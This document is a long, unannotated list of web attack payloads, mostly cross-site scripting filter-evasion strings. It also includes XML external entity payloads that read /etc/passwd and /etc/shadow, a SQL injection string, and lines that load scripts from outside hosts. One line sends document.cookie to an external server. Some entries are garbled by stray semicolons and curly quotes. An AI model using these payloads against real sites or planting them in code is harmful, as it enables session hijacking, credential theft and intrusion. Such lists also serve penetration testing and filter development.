<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>;
<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>;
<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>;
<;IMGSRC=";javascri
pt:alert';XS&
#x0D;S';)";>;
perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out
perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out
<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>;
<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
<;SCRIPT SRC=http://ha.ckers.org/xss.js
<;SCRIPT SRC=//ha.ckers.org/.j>;
<;IMG SRC=";javascript:alert(';XSS';)";
<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>;
<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>;
<;SCRIPT>;a=/XSS/
<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT
SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
<;A HREF=";http://66.102.7.147/";>;XSS<;/A>;
<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;
<;A HREF=";http://1113982867/";>;XSS<;/A>;
<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;
<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>;
<;A HREF=";h
tt	p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>;
<;A HREF=";//www.google.com/";>;XSS<;/A>;
<;A HREF=";//google";>;XSS<;/A>;
<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>;
<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>;
<;A HREF=";http://google.com/";>;XSS<;/A>;
<;A HREF=";http://www.google.com./";>;XSS<;/A>;
<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;
<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;
<script>document.vulnerable=true;</script>
<img SRC="jav ascript:document.vulnerable=true;">
<img SRC="javascript:document.vulnerable=true;">
<img SRC="  javascript:document.vulnerable=true;">
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
<script <B>document.vulnerable=true;</script>
<img SRC="javascript:document.vulnerable=true;"
<iframe src="javascript:document.vulnerable=true; <
<script>a=/XSS/\ndocument.vulnerable=true;</script>
\";document.vulnerable=true;;//
</title><SCRIPT>document.vulnerable=true;</script>
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
<body BACKGROUND="javascript:document.vulnerable=true;">
<body ONLOAD=document.vulnerable=true;>
<img DYNSRC="javascript:document.vulnerable=true;">
<img LOWSRC="javascript:document.vulnerable=true;">
<bgsound SRC="javascript:document.vulnerable=true;">
<br SIZE="&{document.vulnerable=true}">
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
<style>li {list-style-image:
url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
<img SRC='vbscript:document.vulnerable=true;'>
1script3document.vulnerable=true;1/script3
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
<meta HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:document.vulnerable=true;">
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
<table BACKGROUND="javascript:document.vulnerable=true;">
<table><TD BACKGROUND="javascript:document.vulnerable=true;">
<div STYLE="background-image: url(javascript:document.vulnerable=true;)">
<div STYLE="background-image: url(javascript:document.vulnerable=true;)">
<div STYLE="width: expression(document.vulnerable=true);">
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
<XSS STYLE="xss:expression(document.vulnerable=true)">
exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
<style TYPE="text/javascript">document.vulnerable=true;</style>
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A
CLASS=XSS></a>
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</
style>

<base HREF="javascript:document.vulnerable=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
value=javascript:document.vulnerable=true></object>
<XML ID=I><X><C><![<IMG
SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I
DATAFLD=C DATAFORMATAS=HTML></span>
<XML ID="xss"><I><B><IMG SRC="javascript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B"
DATAFORMATAS="HTML"></span>
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import
namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML"
to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
<meta HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.vulnerable=true;">
<div onmouseover="document.vulnerable=true;">
<img src="javascript:document.vulnerable=true;">
<img dynsrc="javascript:document.vulnerable=true;">
<input type="image" dynsrc="javascript:document.vulnerable=true;">
<bgsound src="javascript:document.vulnerable=true;">
&<script>document.vulnerable=true;</script>
&{document.vulnerable=true;};
<img src=&{document.vulnerable=true;};>
<link rel="stylesheet" href="javascript:document.vulnerable=true;">
<iframe src="vbscript:document.vulnerable=true;">
<img src="mocha:document.vulnerable=true;">
<img src="livescript:document.vulnerable=true;">
<a href="about:<script>document.vulnerable=true;</script>">
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
<body onload="document.vulnerable=true;">
<div style="background-image: url(javascript:document.vulnerable=true;);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(document.vulnerable=true;);">
<style type="text/javascript">document.vulnerable=true;</style>
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
<style></script>
<<script>document.vulnerable=true;</script>
<![</script>
<script>document.vulnerable=true;</script>
<img src="blah"onmouseover="document.vulnerable=true;">
<img src="blah>" onmouseover="document.vulnerable=true;">
<xml src="javascript:document.vulnerable=true;">
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
<style>@import'http://www.securitycompass.com/xss.css';</style>
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>;
REL=stylesheet">
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</
style>
<OBJECT TYPE="text/x-scriptlet"
DATA="http://www.securitycompass.com/scriptlet.html"></object>
<HTML xmlns:xss><?import namespace="xss"
implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
<script SRC="http://www.securitycompass.com/xss.jpg"></script>

<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
<script =">" SRC="http://www.securitycompass.com/xss.js"></script>
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
<script>document.write("<SCRI");</SCRIPT>PT
SRC="http://www.securitycompass.com/xss.js"></script>
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
<;/script>;<;script>;alert(1)<;/script>;
<;/br style=a:expression(alert())>;
<;scrscriptipt>;alert(1)<;/scrscriptipt>;
<;br size=\";&;{alert('XSS')}\";>;
perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out
perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?
sid="%2bdocument.cookie)>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS STYLE=xss:expression(alert('XSS'))>
"><script>alert('XSS')</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
</XSS STYLE=xss:expression(alert('XSS'))>
>"><script>alert("XSS")</script>&
"><STYLE>@import"javascript:alert('XSS')";</STYLE>
>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%2
3x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful
%26quot;)>
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert("XSS<WBR>")>
<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:a
le&<WBR>#114;t('X&#83<WBR>;S'&#41>
<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#00
00105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#
0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>
<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#
x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
<IMG SRC="javascript:alert(<WBR>'XSS');">
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<!
[CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY
xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY
xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY
xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY
xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
<script>alert('XSS')</script>
%3cscript%3ealert('XSS')%3c/script%3e
%22%3e%3cscript%3ealert('XSS')%3c/script%3e
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG
SRC=javascript:ale&#
114;t('XSS')>
<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112
&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#00
00088&#0000083&#0000083&#0000039&#0000041>
<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&
#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
<<SCRIPT>alert("XSS");//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
"><s"%2b"cript>alert(document.cookie)</script>
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";al
ert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<marquee onstart='javascript:alert('1');'>=(◕_◕)=
<scrip
t>aler
t(123)
;</
script
>

<ScRipT>alert("XSS");</ScRipT>

<script>alert(123)</script>

<script>alert("hellox worldss");</script>

<script>alert(“XSS”)</script>
<script>alert(“XSS”);</script>

<script>alert(‘XSS’)</script>

“><script>alert(“XSS”)</script>

<script>alert(/XSS”)</script>

<script>alert(/XSS/)</script>

</script><script>alert(1)</script>

‘; alert(1);

‘)alert(1);//

<ScRiPt>alert(1)</sCriPt>

<IMG SRC=jAVasCrIPt:alert(‘XSS’)>

<IMG SRC=”javascript:alert(‘XSS’);”>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=javascript:alert(‘XSS’)>

<img src=xss onerror=alert(1)>

<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>

<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'

<input/onmouseover="javaSCRIPT&colon;confirm(1)"
<sVg><scRipt %00>alert(1) {Opera}

<img/src=`%00` onerror=this.onerror=confirm(1)

<form><isindex formaction="javascript&colon;confirm(1)"

<img src=`%00`&NewLine; onerror=alert(1)&NewLine;

<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

<script /%00/>/%00/alert(1)/%00/</script /%00/

"><h1/onmouseover='\u0061lert(1)'>%00

<iframe/src="data:text/html,<svg onload=alert(1)>">

<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-

equiv="refresh"/>
<svg><script
xlink:href=data&colon;,window.open('https://www.google.com/')></script

<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">

<iframe src=javascript&colon;alert(document&period;location)>

<form><a href="javascript:\u0061lert(1)">X

</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/
onerror='eval(src)'>

<img/	
 src=`~` onerror=prompt(1)>

<form><iframe 	
 src="javascript:alert(1)"
	;>

<a href="data:application/x-x509-user-
cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
&#11
;>X</a

http://www.google<script .com>alert(document.location)</script

<a href=[]"
onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')

<style/onload=prompt('XSS')

<script ^^>alert(String.fromCharCode(49))</script ^^

</style  ><script   :-(>//alert(document.location)//</script   :-

(

</form><input type="date" onfocus="alert(1)">

<form><textarea  onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/
***/</script /***/

<iframe srcdoc='<body onload=prompt(1)>'>

<a href="javascript:void(0)"
onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

<script ~>alert(0%0)</script ~>

<style/onload=<!--	>
alert
(1)>

<///style///><span %2F onmousemove='alert(1)'>SPAN

<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

"><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}

<marquee onstart='javascript:alert(1)'>^__^

<div/style="width:expression(confirm(1))">X</div> {IE7}

<iframe/%00/ src=javaSCRIPT&colon;alert(1)

//<form/action=javascript:alert(document&period;cookie)><input/
type='submit'>//

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script
//|\\

</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</
style>

<a/href="javascript: javascript:prompt(1)"><input type="X">

</plaintext\></|\><plaintext/onmouseover=prompt(1)

</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1)
{Opera}

<a href="javascript&colon;\u0061l&#101%72t(1)"><button>

<div onmouseover='alert(1)'>DIV</div>

<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)">

<a href="jAvAsCrIpT&colon;alert(1)">X</a>

<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/
helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/
helloworld_js_X.pdf">

<var onmouseover="prompt(1)">On Mouse Over</var>

<a href=javascript&colon;alert(document&period;cookie)>Click Here</a>

<img src="/" =_=" title="onerror='prompt(1)'">

<%

<script src="data:text/javascript,alert(1)"></script>

<iframe/src \/\/onload = prompt(1)

<iframe/onreadystatechange=alert(1)

<svg/onload=alert(1)

<input value=<><iframe/src=javascript:confirm(1)

<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

http://www.<script>alert(1)</script .com

<iframe
src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&T
ab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Ta
b;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab
;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&New
Line;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab
;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;
&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&
Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&T
ab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta
b;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta
b;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab
;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>

<svg><script ?>alert(1)

<iframe
src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Ta
b;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

<img src=`xx:xx`onerror=alert(1)>

<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>

<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf"
allowscriptaccess=always>

<svg contentScriptType=text/vbs><script>MsgBox+1

<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a

<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \

u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></
script a=\u0061 & /=%2F

<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C
%65%72%74(/XSS/)></script

<object data=javascript&colon;\u0061l&#101%72t(1)>

<script>+-+-1-+-+alert(1)</script>

<body/onload=<!-->&#10alert(1)>

<script itworksinallbrowsers>/<script */alert(1)</script

<img src ?itworksonchrome?\/onerror = alert(1)

<svg><script>//&NewLine;confirm(1);</script </svg>

<svg><script onlypossibleinopera:-)> alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa

href=j&#97v&#97script:&#97lert(1)>ClickMe

<script x> alert(1) </script 1=2

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>

<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x00
0070&#x074,ale&#x00000072;t(1)></script>

<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>

"><img src=x onerror=window.open('https://www.google.com/');>

<form><button formaction=javascript&colon;alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click

<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C
%2F%73%63%72%69%70%74%3E"></iframe>

<a
href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#
61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#10
9&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&
#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>

‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”
;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–
></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=”jav ascript:alert(‘XSS’);”>

<IMG SRC=”jav	ascript:alert(‘XSS’);”>

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

%253cscript%253ealert(1)%253c/script%253e

“><s”%2b”cript>alert(document.cookie)</script>
foo<script>alert(1)</script>

<scr<script>ipt>alert(1)</scr</script>ipt>

<IMG
SRC=javascript:al&#10
1;rt('XSS')>

<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#000
0112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#000
0039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#
x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

<BODY ONLOAD=alert(‘XSS’)>

<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>

<IMG SRC=”javascript:alert(‘XSS’)”

<iframe src=http://ha.ckers.org/scriptlet.html <

javascript:alert("hellox worldss")

<img src="javascript:alert('XSS');">

<img src=javascript:alert("XSS")>

<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))
//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"
AllowScriptAccess="always"></EMBED>

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))
//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//
";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//
--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/
SCRIPT>&submit.x=27&submit.y=9&cmd=search

<script>alert("hellox
worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510

<script>alert("XSS");</script>&search=1

0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?
8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?
(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-
frmGoogleWeb=Web+Search

<h1><font color=blue>hellox worldss</h1>

<BODY ONLOAD=alert('hellox worldss')>

<input onfocus=write(XSS) autofocus>

<input onblur=write(XSS) autofocus><input autofocus>

<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input
autofocus>

<form><button formaction="javascript:alert(XSS)">lol

<img src=x onerror=alert(XSS)//">

<![><img src="]><img src=x onerror=alert(XSS)//">

<style><img src="</style><img src=x onerror=alert(XSS)//">

<? foo="><script>alert(1)</script>">

<! foo="><script>alert(1)</script>">

</ foo="><script>alert(1)</script>">

<? foo="><x foo='?><script>alert(1)</script>'>">

<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">

<% foo><x foo="%><script>alert(123)</script>">

<div style="font-family:'foo
;color:red;';">LOL

LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/
color:green;color:bl/*IE*/ue;}</style>

<script>({0:#0=alert/#0#/#0#(0)})</script>

<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>

<SCRIPT>alert(/XSS/.source)</SCRIPT>

\\";alert('XSS');//

</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">

